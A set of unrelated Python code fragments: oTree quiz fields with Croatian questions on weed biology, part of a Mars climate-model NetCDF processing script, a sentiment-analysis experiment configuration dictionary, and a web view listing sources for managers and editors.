test3_q2 = models.IntegerField(label = 'Poljoprivredno stanište u kojem raste neka biljka zove se:',
choices = [
[1, 'agrobiosfera'],
[2, 'agrosfera'],
[3, 'biotop'],
[4, 'agrobiotop']],
widget = widgets.RadioSelect)
test3_q3 = models.IntegerField(label = 'Neki korovi biološku reprodukciju u nepovoljnim uvjetima osiguravaju putem:',
choices = [
[1, 'neotenije'],
[2, 'alelopatije'],
[3, 'diploidije'],
[4, 'domestikacije']],
widget = widgets.RadioSelect)
test3_q4 = models.IntegerField(label = 'Veći stupanj domestikacije korova dovodi do:',
choices = [
[1, 'smanjenja alelopatijskog djelovanja'],
[2, 'bržeg širenja sjemenja'],
[3, 'promjene ploidije korova'],
[4, 'smanjenja dormantnosti']],
widget = widgets.RadioSelect)
test3_q5 = models.IntegerField(label = 'Veći, bujniji i varijabilniji korovi imaju karakteristiku:',
choices = [
[1, 'poliploidije'],
[2, 'neotenije'],
[3, 'dormantnosti'],
[4, 'fertilizacije']],
widget = widgets.RadioSelect)
test3_q6 = models.IntegerField(label = 'Neotenija korova za posljedicu ima:',
choices = [
[1, 'povećanu plastičnost'],
[2, 'brzo sazrijevanje'],
[3, 'prilagodbu kulturnim biljkama'],
[4, 'stvaranje velikog broja sjemenki']],
widget = widgets.RadioSelect)
test3_q7 = models.IntegerField(label = 'Velika otpornost sjemenki korova na štetne eksterne utjecjaje proizlazi iz:',
choices = [
[1, 'malih dimenzija sjemena'],
[2, 'male mase sjemena'],
[3, 'čvrste sjemene ljuske'],
[4, 'kalijpozitivnosti sjemena']],
widget = widgets.RadioSelect)
test3_q8 = models.IntegerField(label = 'Pojam poliploidija se odnosi na:',
choices = [
[1, 'broj setova kromosoma'],
[2, 'broj zigotnih stanica'],
[3, 'broj alelopatijskih odnosa'],
[4, 'broj izdanaka koji tvore stabljiku']],
widget = widgets.RadioSelect)
test3_q9 = models.IntegerField(label = 'Veću otpornost prema ekstremnim abiotskim utjecajima korovi mogu zahvaliti:',
choices = [
[1, 'svom florističkom sastavu'],
[2, 'pretežnoj diploidnosti i bujnosti'],
[3, 'strukturi korijena i razgranatosti stabljike'],
[4, 'većoj vitalnosti i većoj heterozigotnosti']],
widget = widgets.RadioSelect)
test3_q10 = models.IntegerField(label = 'Dormantnost je karakteristika korova koja se odnosi na:',
choices = [
[1, 'mogućnost odgođenog klijanja'],
[2, 'prilagodbu kulturnim biljkama'],
[3, 'širenje sjemena isključivo u proljeće'],
[4, 'klijanje usko vezano uz rast druge biljke']],
widget = widgets.RadioSelect)
# question_id = models.IntegerField()
# question = models.StringField()
# solution = models.StringField()
# submitted_answer = models.StringField(widget=widgets.RadioSelect)
# is_correct = models.BooleanField()
#
# def current_question(self):
# return self.session.vars['questions'][self.round_number - 1]
#
# def check_correct(self):
# self.is_correct = (self.submitted_answer == self.solution)
| |
fullnameIN[:-3]+out_ext+'.nc'
#Append extension, in any:
if parser.parse_args().ext:fullnameOUT=fullnameOUT[:-3]+'_'+parser.parse_args().ext+'.nc'
fdiurn = Dataset(fullnameIN, 'r', format='NETCDF4_CLASSIC')
var_list = filter_vars(fdiurn,parser.parse_args().include) # get all variables
#find time of day variable name
tod_name=find_tod_in_diurn(fdiurn)
tod_in=fdiurn.variables[tod_name][:]
lon=fdiurn.variables['lon'][:]
areo=fdiurn.variables['areo'][:]
fnew = Ncdf(fullnameOUT) # define a Ncdf object from the Ncdf wrapper module
#Copy all dims but time of day from the old file to the new file
#Harmonics to reconstruct the signal , we will use the original time_of_day array.
if parser.parse_args().reconstruct:
fnew.copy_all_dims_from_Ncfile(fdiurn)
#Copy time_of_day axis from initial files
fnew.copy_Ncaxis_with_content(fdiurn.variables[tod_name])
else:
fnew.copy_all_dims_from_Ncfile(fdiurn,exclude_dim=[tod_name])
# Create new dimension holding the harmonics. We will reuse the 'time_of_day' name to facilitate
# compatibility with others routines but keep in mind this is the harmonic number
fnew.add_dim_with_content('time_of_day_%i'%(N),np.arange(1,N+1),longname_txt="tidal harmonics",units_txt="Diurnal harmonic number",cart_txt='N')
#Loop over all variables in file
for ivar in var_list:
varNcf = fdiurn.variables[ivar]
varIN=varNcf[:]
var_unit=varNcf.units
if tod_name in varNcf.dimensions and ivar not in [tod_name,'areo'] and len(varNcf.shape)>2 :
prCyan("Processing: %s ..."%(ivar))
# Normalize the data
if parser.parse_args().normalize:
norm=np.mean(varIN,axis=1)[:,np.newaxis,...] #normalize and reshape array along the time_of_day dimension
varIN=100*(varIN-norm)/norm
var_unit='% of diurnal mean'
amp,phas=diurn_extract(varIN.swapaxes(0,1),N,tod_in,lon)
if parser.parse_args().reconstruct:
VARN=reconstruct_diurn(amp,phas,tod_in,lon,sumList=[])
for nn in range(N):
fnew.log_variable("%s_N%i"%(ivar,nn+1),VARN[nn,...].swapaxes(0,1),varNcf.dimensions,"harmonic N=%i for %s"%(nn+1,varNcf.long_name),var_unit)
else:
#Update the dimensions
new_dim=list(varNcf.dimensions)
new_dim[1]='time_of_day_%i'%(N)
fnew.log_variable("%s_amp"%(ivar),amp.swapaxes(0,1),new_dim,"tidal amplitude for %s"%(varNcf.long_name),var_unit)
fnew.log_variable("%s_phas"%(ivar),phas.swapaxes(0,1),new_dim,"tidal phase for %s"%(varNcf.long_name),'hr')
elif ivar in ['pfull', 'lat', 'lon','phalf','pk','bk','pstd','zstd','zagl','time']:
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncaxis_with_content(fdiurn.variables[ivar])
elif ivar in ['areo']:
if parser.parse_args().reconstruct:
#time_of_day is the same size as the original file
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncvar(fdiurn.variables['areo'])
else:
prCyan("Processing: %s ..."%(ivar))
#Create areo variable reflecting the new shape
areo_new=np.zeros((areo.shape[0],N,1))
#Copy areo
for xx in range(N):areo_new[:,xx,:]=areo[:,0,:]
#Update the dimensions
new_dim=list(varNcf.dimensions)
new_dim[1]='time_of_day_%i'%(N)
fnew.log_variable(ivar,areo_new,new_dim,varNcf.long_name,varNcf.units)
fnew.close()
#===========================================================================
#======================== Regrid files ===================================
#===========================================================================
elif parser.parse_args().regrid_source:
out_ext='_regrid'
name_target=parser.parse_args().regrid_source[0]
#Add path unless full path is provided
if not ('/' in name_target):name_target= path2data + '/' + name_target
fNcdf_t=Dataset(name_target,'r')
for filei in file_list:
#Add path unless full path is provided
if not ('/' in filei):
fullnameIN = path2data + '/' + filei
else:
fullnameIN=filei
fullnameOUT = fullnameIN[:-3]+out_ext+'.nc'
#Append extension, in any:
if parser.parse_args().ext:fullnameOUT=fullnameOUT[:-3]+'_'+parser.parse_args().ext+'.nc'
f_in = Dataset(fullnameIN, 'r', format='NETCDF4_CLASSIC')
var_list = filter_vars(f_in,parser.parse_args().include) # get all variables
fnew = Ncdf(fullnameOUT) # define a Ncdf object from the Ncdf wrapper module
#Copy all dims from the target file to the new file
fnew.copy_all_dims_from_Ncfile(fNcdf_t)
#Loop over all variables in file
for ivar in var_list:
varNcf = f_in.variables[ivar]
if ivar in ['pfull', 'lat', 'lon','phalf','pk','bk','pstd','zstd','zagl','time','areo']:
prCyan("Copying axis: %s..."%(ivar))
fnew.copy_Ncaxis_with_content(fNcdf_t.variables[ivar])
elif varNcf.dimensions[-2:]==('lat', 'lon'): #Ignore variables like 'time_bounds', 'scalar_axis' or 'grid_xt_bnds'...
prCyan("Regridding: %s..."%(ivar))
var_OUT=regrid_Ncfile(varNcf,f_in,fNcdf_t)
fnew.log_variable(ivar,var_OUT,varNcf.dimensions,varNcf.long_name,varNcf.units)
fnew.close()
fNcdf_t.close()
f_in
else:
prRed("""Error: no action requested: use 'MarsFiles *nc --fv3 --combine, --tshift, --bin_average, --bin_diurn etc ...'""")
#END of script
#*******************************************************************************
#*************Definitions for functions used in this script ********************
#*******************************************************************************
def make_FV3_files(fpath,typelistfv3,renameFV3=True,cwd=None):
'''
Make FV3-type atmos_average,atmos_daily,atmos_diurn
Args:
fpath : full path to Legacy .nc files
typelistfv3: e.g['average', 'daily', 'diurn']
renameFV3 : rename files from Legacy_Lsxxx_Lsyyy.nc to XXXXX.atmos_average.nc folllowing FV3's convention
cwd : output path
Returns:
atmos_average,atmos_daily,atmos_diurn
'''
histname = os.path.basename(fpath)
if cwd is None:
histdir = os.path.dirname(fpath)
else:
histdir = cwd
histfile = Dataset(fpath,'r',format='NETCDF4_CLASSIC')
histvars = histfile.variables.keys()
histdims = histfile.dimensions.keys()
#Convert the first Ls in file to a sol number
if renameFV3:fdate= '%05i'%(ls2sol_1year(histfile.variables['ls'][0]))
def proccess_file(newf,typefv3):
for dname in histdims:
if dname == 'nlon':
var=histfile.variables['longitude']
npvar=var[:]
newf.add_dim_with_content('lon',npvar,'longitude',getattr(var,'units'),'X')
elif dname == 'nlat':
var=histfile.variables['latitude']
npvar=var[:]
newf.add_dim_with_content('lat',npvar,'latitude',getattr(var,'units'),'Y')
elif dname == 'time':
newf.add_dimension('time',None)
elif dname == 'ntod' and typefv3=='diurn':
dim=histfile.dimensions[dname]
newf.add_dimension('time_of_day_16',dim.size)
elif dname == 'nlay':
nlay=histfile.dimensions[dname]
num =nlay.size
nump=num+1
pref=7.01*100 # in Pa
pk=np.zeros(nump)
bk=np.zeros(nump)
pfull=np.zeros(num)
phalf=np.zeros(nump)
sgm =histfile.variables['sgm']
pk[0]=0.08/2 #[AK] changed pk[0]=.08 to pk[0]=.08/2, otherwise phalf[0] would be greater than phalf[1]
#*** NOTE that pk in amesGCM/mars_data/Legacy.fixed.nc was also updated***
for z in range(num):
bk[z+1] = sgm[2*z+2]
phalf[:]=pk[:]+pref*bk[:] # output in Pa
# DEPRECIATED: pfull[:] = (phalf[1:]-phalf[:num])/(np.log(phalf[1:])-np.log(phalf[:num]))
#First layer
if pk[0]==0 and bk[0]==0:
pfull[0]=0.5*(phalf[0]+phalf[1])
else:
pfull[0]=(phalf[1]-phalf[0])/(np.log(phalf[1])-np.log(phalf[0]))
#Rest of layers:
pfull[1:] = (phalf[2:]-phalf[1:-1])/(np.log(phalf[2:])-np.log(phalf[1:-1]))
newf.add_dim_with_content('pfull',pfull,'ref full pressure level','Pa')
newf.add_dim_with_content('phalf',phalf,'ref half pressure level','Pa')
newf.log_axis1D('pk',pk,('phalf'),longname_txt='pressure part of the hybrid coordinate',units_txt='Pa',cart_txt='')
newf.log_axis1D('bk',bk,('phalf'),longname_txt='sigma part of the hybrid coordinate',units_txt='Pa',cart_txt='')
else:
dim=histfile.dimensions[dname]
newf.add_dimension(dname,dim.size)
#===========END function========
if 'average' in typelistfv3:
newfname_avg = fdate+'.atmos_average.nc' #5 sol averages over tod and time
newfpath_avg = os.path.join(histdir,newfname_avg)
newfavg = Ncdf(newfpath_avg)
proccess_file(newfavg,'average')
do_avg_vars(histfile,newfavg,True,True)
newfavg.close()
if 'daily' in typelistfv3:
newfname_daily = fdate+'.atmos_daily.nc' #daily snapshot output...this is exactly the current output?
newfpath_daily = os.path.join(histdir,newfname_daily)
newfdaily = Ncdf(newfpath_daily)
proccess_file(newfdaily,'daily')
do_avg_vars(histfile,newfdaily,False,False)
newfdaily.close()
if 'diurn' in typelistfv3:
newfname_diurn = fdate+'.atmos_diurn.nc' #5 sol averages over time only
newfpath_diurn = os.path.join(histdir,newfname_diurn)
newfdiurn = Ncdf(newfpath_diurn)
proccess_file(newfdiurn,'diurn')
do_avg_vars(histfile,newfdiurn,True,False)
newfdiurn.close()
if 'fixed' in typelistfv3:
#Copy Legacy.fixed to current directory
cmd_txt='cp '+sys.prefix+'/mars_data/Legacy.fixed.nc '+fdate+'.fixed.nc'
p = subprocess.run(cmd_txt, universal_newlines=True, shell=True)
print(cwd+'/'+fdate+'.fixed.nc was copied locally')
#Function to perform time averages over all fields
def do_avg_vars(histfile,newf,avgtime,avgtod,Nday=5):
histvars = histfile.variables.keys()
for vname in histvars:
var = histfile.variables[vname]
npvar = var[:]
dims = var.dimensions
ndims = npvar.ndim
vshape= npvar.shape
ntod = histfile.dimensions['ntod']
longname_txt=getattr(histfile.variables[vname],'long_name','')
#On some files like the LegacyGCM_Ls*** on the NAS dataportal, the attribute 'long_name' may be mispelled 'longname'
if longname_txt=='':longname_txt=getattr(histfile.variables[vname],'longname','')
units_txt=getattr(histfile.variables[vname],'units','')
if avgtod:
newdims = replace_dims(dims,True)
elif avgtime:
newdims = replace_dims(dims,False)
else:
newdims = replace_dims(dims,True)
if 'time' in dims:
tind = dims.index('time')
tind_new= newdims.index('time')
numt = histfile.dimensions['time'].size
#TODO fix time !!
#now do various time averaging and write to files
if ndims == 1:
if vname == 'ls':
#first check if spans new year
if not np.all(npvar[1:] >= npvar[:-1]):
year = 0.
for x in range(1,npvar.size):
if 350. < npvar[x-1] < 360. and npvar[x] < 10.:
year += 1.
npvar[x] += 360.*year
#Create a time array
time0=ls2sol_1year(npvar[0])+np.linspace(0,10.,len(npvar))
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday),axis=1)
time0 = np.mean(time0.reshape(-1,Nday),axis=1)
if not avgtime and not avgtod: #i.e daily file
# Solar longitude
ls_start = npvar[0]
ls_end = npvar[-1]
step = (ls_end-ls_start)/np.float32(((numt-1)*ntod.size))
varnew = np.arange(0,numt*ntod.size,dtype=np.float32)
varnew[:] = varnew[:]*step+ls_start
#Time
step = (ls2sol_1year(ls_end)-ls2sol_1year(ls_start))/np.float32((numt*ntod.size))
time0 = np.arange(0,numt*ntod.size,dtype=np.float32)
time0[:] = time0[:]*step+ls2sol_1year(ls_start)
newf.log_axis1D('areo',varnew,dims,longname_txt='solar longitude',units_txt='degree',cart_txt='T')
newf.log_axis1D('time',time0,dims,longname_txt='sol number',units_txt='days since 0000-00-00 00:00:00',cart_txt='T')#added AK
else:
continue
elif ndims == 4:
varnew = npvar
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday,vshape[1],vshape[2],vshape[3]),axis=1)
if avgtod:
varnew = varnew.mean(axis=1)
if not avgtime and not avgtod:
varnew = npvar.reshape(-1,vshape[2],vshape[3])
#Rename variable
vname2,longname_txt2,units_txt2=change_vname_longname_unit(vname,longname_txt,units_txt)
#AK convert surface pressure from mbar to Pa
if vname2=='ps':varnew*=100.
newf.log_variable(vname2,varnew,newdims,longname_txt2,units_txt2)
elif ndims == 5:
varnew = npvar
if avgtime:
varnew = np.mean(npvar.reshape(-1,Nday,vshape[1],vshape[2],vshape[3],vshape[4]),axis=1)
if avgtod:
varnew = varnew.mean(axis=1)
if not avgtime and not avgtod:
varnew = npvar.reshape(-1,vshape[2],vshape[3],vshape[4])
#Rename variables
vname2,longname_txt2,units_txt2=change_vname_longname_unit(vname,longname_txt,units_txt)
newf.log_variable(vname2,varnew,newdims,longname_txt2,units_txt2)
elif vname == 'tloc':
if avgtime and not avgtod:
vname2='time_of_day_16'
longname_txt2='time of day'
units_txt2='hours since 0000-00-00 00:00:00'
# Overwrite tod from ('time_of_day_16', 'lon') to time_of_day_16
newdims=('time_of_day_16')
npvar=np.arange(0.75,24,1.5) # every 1.5 hours, centered at half timestep ? AK
newf.log_variable(vname2,npvar,newdims,longname_txt2,units_txt2)
return 0
def change_vname_longname_unit(vname,longname_txt,units_txt):
'''
Update variables names, longname and units. This was designed specifically for LegacyCGM.nc files.
'''
if vname == 'psurf':
vname = 'ps'
longname_txt='surface pressure'
units_txt='Pa'
elif vname == 'tsurf':
vname = 'ts'
longname_txt='surface temperature'
units_txt='K'
elif vname=='dst_core_mass':
vname = 'cor_mass'
longname_txt='dust core mass for the water ice aerosol'
units_txt='kg/kg'
elif vname=='h2o_vap_mass':
vname = 'vap_mass'
longname_txt='water vapor mixing ratio'
units_txt='kg/kg'
elif vname=='h2o_ice_mass':
vname = 'ice_mass'
longname_txt='water ice aerosol mass mixing ratio'
units_txt='kg/kg'
elif vname=='dst_mass':
vname = 'dst_mass'
longname_txt='dust aerosol mass mixing ratio'
units_txt='kg/kg'
elif vname=='dst_numb':
vname = 'dst_num'
longname_txt='dust aerosol number'
units_txt='number/kg'
elif vname=='h2o_ice_numb':
vname = 'ice_num'
longname_txt='water ice aerosol number'
units_txt='number/kg'
elif vname=='temp':
longname_txt='temperature'
units_txt='K'
elif vname=='ucomp':
longname_txt='zonal wind'
units_txt='m/s'
elif vname=='vcomp':
longname_txt='meridional wind'
units_txt='m/s'
else:
#Return original values
pass
return vname,longname_txt,units_txt
def replace_dims(dims,todflag):
'''
Function to replace dimensions with fv3 names and remove tod.
This was designed specifically for LegacyCGM.nc files.
'''
newdims = dims
if 'nlat' in dims:
newdims = replace_at_index(newdims,newdims.index('nlat'),'lat')
if 'nlon' in dims:
newdims = replace_at_index(newdims,newdims.index('nlon'),'lon')
if 'nlay' in dims:
newdims = replace_at_index(newdims,newdims.index('nlay'),'pfull')
if 'ntod' in dims:
if todflag:
newdims = replace_at_index(newdims,newdims.index('ntod'),None)
else:
newdims = replace_at_index(newdims,newdims.index('ntod'),'time_of_day_16')
return newdims
def replace_at_index(tuple_dims, idx, new_name):
'''
Function to update dimensions.
Args:
tup: dimensions as tuples, e.g. | |
<gh_stars>0
THE_BOOK_OF_EXPERIMENTS = {
"brahmaputra": {
"imdb": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer. This is a regression "
"experiment without rescaling the ground "
"truth to 0-1. Very little weight decay",
"dataset": {
"name": "IMDB",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"sigmoid activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network. Rescaled GT with "
"sigmoid",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors and "
"use spacy's vocab. Here we also train"
" the embeddings along with the "
"network. Medium sized network. Weight "
"decay",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"use_spacy_vocab": True,
"load_spacy_vectors": True,
"max_seq_length": 300,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": True
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 600,
"cnn_kernel_sizes": [3, 5, 9, 13, 20],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 1200,
"rnn_layers": 3,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer. This is a regression "
"experiment without rescaling the ground "
"truth to 0-1. Very little weight "
"decay. Here we use an LSTM cell",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.2,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "lstm"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
],
"amazon_reviews_imbalanced_de": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"relu activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "amazon_reviews_imbalanced_de",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 150,
"rescale": (0, 1),
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 5000,
"save_every": 5000,
"early_stopping_delta": 0.0001,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network. Rescaled GT with "
"relu",
"dataset": {
"name": "amazon_reviews_imbalanced_de",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 130,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 5000,
"save_every": 5000,
"early_stopping_delta": 0.0001,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "sigmoid"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
],
"stanford_sentiment_treebank": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of rescaling "
"the ground truth to 0-1 and adding a "
"relu activation function at the "
"last layer (regression layer). No "
"weight decay",
"dataset": {
"name": "stanford_sentiment_treebank",
"n_workers": 5,
"use_spacy_vocab": True,
"load_spacy_vectors": True,
"max_seq_length": 0,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 100,
"save_every": 100,
"early_stopping_delta": 0.0,
"patience": 100000,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
},
"regression": {
"activation": "relu"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.00001,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
}
]
},
"yamuna": {
"imdb": [
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN_CLASSIFICATION",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of freezing the"
" embedding layer.",
"dataset": {
"name": "IMDB",
"n_workers": 5,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0.0,
"patience": 20,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.1,
"preload_word_vectors": True,
"train_embeddings": True
},
"ngram_cnn": {
"cnn_kernel_dims": 500,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.2
},
"rnn": {
"rnn_hidden_size": 600,
"rnn_layers": 2,
"bidirectional": True,
"rnn_dropout": 0.3,
"cell_type": "gru"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, 19]
}
},
{
"experiment_name": "SA_EMBED_NGRAM_CNN_RNN_CLASSIFICATION",
"experiment_description": "Train with preloaded spacy vectors. "
"Here we see the impact of having a "
"very small network",
"dataset": {
"name": "IMDB",
"n_workers": 9,
"load_spacy_vectors": True,
"max_seq_length": 400,
"cuda": True
},
"setup": {
"epochs": 30,
"batch_size": 32,
"evaluate_every": 450,
"save_every": 450,
"early_stopping_delta": 0,
"patience": 12,
"train_on_gpu": True,
"save_embeddings": False
},
"pipeline": {
"embedding_layer": {
"embedding_dims": 300,
"embedding_dropout": 0.5,
"preload_word_vectors": True,
"train_embeddings": False
},
"ngram_cnn": {
"cnn_kernel_dims": 50,
"cnn_kernel_sizes": [3, 5, 9, 13],
"cnn_layers": 1,
"cnn_dropout": 0.5
},
"rnn": {
"rnn_hidden_size": 100,
"rnn_layers": 1,
"bidirectional": True,
"rnn_dropout": 0.5,
"cell_type": "gru"
}
},
"optimizer" : {
"learning_rate": 0.001,
"weight_decay": 0.0,
"lr_scheduling_milestones": [2, 7, 15, | |
= SourceRecord.get_sources_search_of_user_as_editor(current_user, status=status)
editor = []
for hit in sources:
editor.append(
{
'id': hit['id'],
'name': hit['name'],
'source_status': hit['source_status'],
'version_to_review': True
}
)
sources_terms = get_arguments_for_source_from_action(
current_user, 'source_term_manager_actions'
)
terms = Term.query.filter(Term.uuid.in_(sources_terms)).all()
sources_orgs = get_arguments_for_source_from_action(
current_user, 'source_organization_manager_actions'
)
orgs = []
for org in sources_orgs:
orgs.append(CuorHelper.query_cuor_by_uuid(org))
response = iroko_json_response(
IrokoResponseStatus.SUCCESS,
'ok',
'sources',
{
'manager': manager,
'editor': editor,
'terms': term_schema_many.dump(terms),
'organizations': orgs,
'admin': is_user_sources_admin(current_user)
}
)
# else:
# raise Exception("role should be manager or editor")
# # print("## iroko_json_response {0}".format(datetime.datetime.now().strftime("%H:%M:%S")))
return response
except Exception as e:
msg = str(e)
return iroko_json_response(IrokoResponseStatus.ERROR, msg, None, None)
